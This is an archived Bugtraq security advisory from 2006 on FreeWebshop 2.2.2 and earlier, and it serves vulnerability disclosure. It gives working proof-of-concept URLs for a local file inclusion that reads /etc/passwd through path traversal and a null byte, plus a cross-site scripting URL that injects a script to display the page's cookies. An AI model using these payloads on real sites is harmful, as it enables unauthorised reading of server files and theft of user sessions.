[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    FreeWebshop <=2.2.2 [local file include & xss]
From:       saps.audit () gmail ! com
Date:       2006-11-08 17:20:24
Message-ID: 20061108172024.21387.qmail () securityfocus ! com
[Download RAW message or body]

FreeWebshop <=2.2.2
severity: hight
vendor site: http://www.freewebshop.org/

impact: an anonymous user can access anyfile on the remote server

PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00


xss get :

http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script>



laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic